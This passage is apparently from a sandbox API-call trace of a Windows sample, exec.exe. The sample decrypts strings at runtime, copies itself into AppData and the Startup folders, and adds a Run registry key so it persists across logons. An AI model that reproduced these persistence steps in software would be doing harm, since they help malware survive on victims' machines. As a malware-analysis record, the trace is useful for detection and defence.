lpMem=0x871590 | out: hHeap=0x870000) returned 1 [0039.068] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x871500, nSize=0x1d | out: lpDst="") returned 0x2c [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871548 | out: hHeap=0x870000) returned 1 [0039.068] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x871500, Size=0x72) returned 0x871500 [0039.068] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x72) returned 0x871580 [0039.068] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x871600 [0039.068] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb0c | out: phKey=0x41fb0c*=0x224ba8) returned 1 [0039.068] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf4, dwFlags=0x0) returned 1 [0039.068] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871600, pdwDataLen=0x41fac0 | out: pbData=0x871600, pdwDataLen=0x41fac0) returned 1 [0039.068] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x870000) returned 1 [0039.068] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x871500, nSize=0x39 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2c [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871580 | out: hHeap=0x870000) returned 1 [0039.068] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.068] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x871580 [0039.069] CryptImportKey (in: hProv=0x224fe0, pbData=0x41facc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb34 | out: phKey=0x41fb34*=0x224ba8) returned 1 [0039.069] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fb1c, dwFlags=0x0) returned 1 [0039.069] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871580, pdwDataLen=0x41fae8 | out: pbData=0x871580, pdwDataLen=0x41fae8) returned 1 [0039.069] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x3e) returned 0x8715c8 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x3e) returned 0x871610 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x871658 [0039.069] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb0c | out: phKey=0x41fb0c*=0x224ba8) returned 1 [0039.069] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf4, dwFlags=0x0) returned 1 [0039.069] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871658, pdwDataLen=0x41fac0 | out: pbData=0x871658, pdwDataLen=0x41fac0) returned 1 [0039.069] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x10) returned 0x8714d8 [0039.069] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa88 | out: phkResult=0x41fa88*=0x94) returned 0x0 [0039.069] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x41fa84, lpData=0x871610, lpcbData=0x41fa8c*=0x3e | out: lpType=0x41fa84*=0x2, lpData=0x871610*=0x80, lpcbData=0x41fa8c*=0x98) returned 0xea [0039.069] RegCloseKey (hKey=0x94) returned 0x0 [0039.069] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.069] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871658 | out: hHeap=0x870000) returned 1 [0039.069] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871610 | out: hHeap=0x870000) returned 1 [0039.069] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8715c8, Size=0x7a) returned 0x8715c8 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x7a) returned 0x871650 [0039.069] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x875480 [0039.070] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb08 | out: phKey=0x41fb08*=0x224ba8) returned 1 [0039.070] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf0, dwFlags=0x0) returned 1 [0039.070] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x875480, pdwDataLen=0x41fabc | out: pbData=0x875480, pdwDataLen=0x41fabc) returned 1 [0039.070] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.070] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x10) returned 0x8714d8 [0039.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa84 | out: phkResult=0x41fa84*=0x94) returned 0x0 [0039.070] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x41fa80, lpData=0x871650, lpcbData=0x41fa88*=0x7a | out: lpType=0x41fa80*=0x2, lpData=0x871650*=0x80, lpcbData=0x41fa88*=0x98) returned 0xea [0039.070] RegCloseKey (hKey=0x94) returned 0x0 [0039.070] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.070] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875480 | out: hHeap=0x870000) returned 1 [0039.070] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871650 | out: hHeap=0x870000) returned 1 [0039.070] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8715c8, Size=0xf2) returned 0x8715c8 [0039.070] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0xf2) returned 0x875480 [0039.070] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8716c8 [0039.070] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb08 | out: phKey=0x41fb08*=0x224ba8) returned 1 [0039.070] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf0, dwFlags=0x0) returned 1 [0039.070] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716c8, pdwDataLen=0x41fabc | out: pbData=0x8716c8, pdwDataLen=0x41fabc) returned 1 [0039.070] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.070] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x10) returned 0x8714d8 [0039.070] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa84 | out: phkResult=0x41fa84*=0x94) returned 0x0 [0039.070] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x41fa80, lpData=0x875480, lpcbData=0x41fa88*=0xf2 | out: lpType=0x41fa80*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x41fa88*=0x98) returned 0x0 [0039.071] RegCloseKey (hKey=0x94) returned 0x0 [0039.071] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.071] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x8714d8 [0039.071] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa84 | out: phkResult=0x41fa84*=0x94) returned 0x0 [0039.071] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x41fa80, lpData=0x875518, lpcbData=0x41fa88*=0x5a | out: lpType=0x41fa80*=0x0, lpData=0x875518*=0xc4, lpcbData=0x41fa88*=0x5a) returned 0x2 [0039.071] RegCloseKey (hKey=0x94) returned 0x0 [0039.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa98 | out: phkResult=0x41fa98*=0x94) returned 0x0 [0039.071] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x41fa94, lpData=0x875518, lpcbData=0x41fa9c*=0x5a | out: lpType=0x41fa94*=0x2, lpData=0x875518*=0xc4, lpcbData=0x41fa9c*=0x78) returned 0xea [0039.071] RegCloseKey (hKey=0x94) returned 0x0 [0039.071] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.071] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716c8 | out: hHeap=0x870000) returned 1 [0039.071] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875480 | out: hHeap=0x870000) returned 1 [0039.071] RtlReAllocateHeap (Heap=0x870000, Flags=0x0, Ptr=0x8715c8, Size=0x1e2) returned 0x875480 [0039.071] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e2) returned 0x875670 [0039.071] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8715c8 [0039.071] CryptImportKey (in: hProv=0x224fe0, pbData=0x41faa0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb08 | out: phKey=0x41fb08*=0x224ba8) returned 1 [0039.071] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41faf0, dwFlags=0x0) returned 1 [0039.071] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8715c8, pdwDataLen=0x41fabc | out: pbData=0x8715c8, pdwDataLen=0x41fabc) returned 1 [0039.071] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.071] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x10) returned 0x8714d8 [0039.072] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa84 | out: phkResult=0x41fa84*=0x94) returned 0x0 [0039.072] RegQueryValueExW (in: hKey=0x94, lpValueName="Startup", lpReserved=0x0, lpType=0x41fa80, lpData=0x875670, lpcbData=0x41fa88*=0x1e2 | out: lpType=0x41fa80*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x41fa88*=0x98) returned 0x0 [0039.072] RegCloseKey (hKey=0x94) returned 0x0 [0039.072] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.072] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x8714d8 [0039.072] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa84 | out: phkResult=0x41fa84*=0x94) returned 0x0 [0039.072] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x41fa80, lpData=0x875708, lpcbData=0x41fa88*=0x14a | out: lpType=0x41fa80*=0x0, lpData=0x875708*=0x0, lpcbData=0x41fa88*=0x14a) returned 0x2 [0039.072] RegCloseKey (hKey=0x94) returned 0x0 [0039.072] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x41fa98 | out: phkResult=0x41fa98*=0x94) returned 0x0 [0039.072] RegQueryValueExW (in: hKey=0x94, lpValueName="Common Startup", lpReserved=0x0, lpType=0x41fa94, lpData=0x875708, lpcbData=0x41fa9c*=0x14a | out: lpType=0x41fa94*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x41fa9c*=0x78) returned 0x0 [0039.073] RegCloseKey (hKey=0x94) returned 0x0 [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714d8 | out: hHeap=0x870000) returned 1 [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8715c8 | out: hHeap=0x870000) returned 1 [0039.073] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x875480, nSize=0xf1 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x99 [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875670 | out: hHeap=0x870000) returned 1 [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871580 | out: hHeap=0x870000) returned 1 [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875670 [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875888 [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875aa0 [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875cb8 [0039.073] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x875670, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875ed0 [0039.073] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x875ed0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x870000) returned 1 [0039.073] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20a) returned 0x875ed0 [0039.073] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x875ed0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0039.073] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875ed0 | out: hHeap=0x870000) returned 1 [0039.074] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe"), bFailIfExists=0) returned 1 [0039.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x41fb9c | out: phkResult=0x41fb9c*=0x0) returned 0x5 [0039.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x41fb88 | out: phkResult=0x41fb88*=0x98) returned 0x0 [0039.089] RegSetValueExW (in: hKey=0x98, lpValueName="exec", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", cbData=0x68 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe") returned 0x0 [0039.089] RegCloseKey (hKey=0x98) returned 0x0 [0039.089] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x134) returned 0x871580 [0039.089] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.090] SetLastError (dwErrCode=0x0) [0039.090] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.091] SetLastError (dwErrCode=0x0) [0039.091] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.092] SetLastError (dwErrCode=0x0) [0039.092] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.093] SetLastError (dwErrCode=0x0) [0039.093] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.094] GetLastError () returned 0x0 [0039.094] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.095] SetLastError (dwErrCode=0x0) [0039.095] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.096] SetLastError (dwErrCode=0x0) [0039.096] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.097] SetLastError (dwErrCode=0x0) [0039.097] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.098] SetLastError (dwErrCode=0x0) [0039.098] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.099] SetLastError (dwErrCode=0x0) [0039.099] GetLastError () returned 0x0 [0039.100] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 1 [0039.134] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871580 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875670 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875888 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875aa0 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875cb8 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871500 | out: hHeap=0x870000) returned 1 [0039.136] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x875480 | out: hHeap=0x870000) returned 1 [0039.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x871470 [0039.137] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fb04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb6c | out: phKey=0x41fb6c*=0x224ba8) returned 1 [0039.137] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fb54, dwFlags=0x0) returned 1 [0039.137] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x871470, pdwDataLen=0x41fb20 | out: pbData=0x871470, pdwDataLen=0x41fb20) returned 1 [0039.137] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871498 [0039.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x8714c0 [0039.137] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8714e8 [0039.137] CryptImportKey (in: hProv=0x224fe0, pbData=0x41fadc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x41fb44 | out: phKey=0x41fb44*=0x224ba8) returned 1 [0039.137] CryptSetKeyParam (hKey=0x224ba8, dwParam=0x1, pbData=0x41fb2c, dwFlags=0x0) returned 1 [0039.137] CryptDecrypt (in: hKey=0x224ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8714e8, pdwDataLen=0x41faf8 | out: pbData=0x8714e8, pdwDataLen=0x41faf8) returned 1 [0039.137] CryptDestroyKey (hKey=0x224ba8) returned 1 [0039.137] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x870000) returned 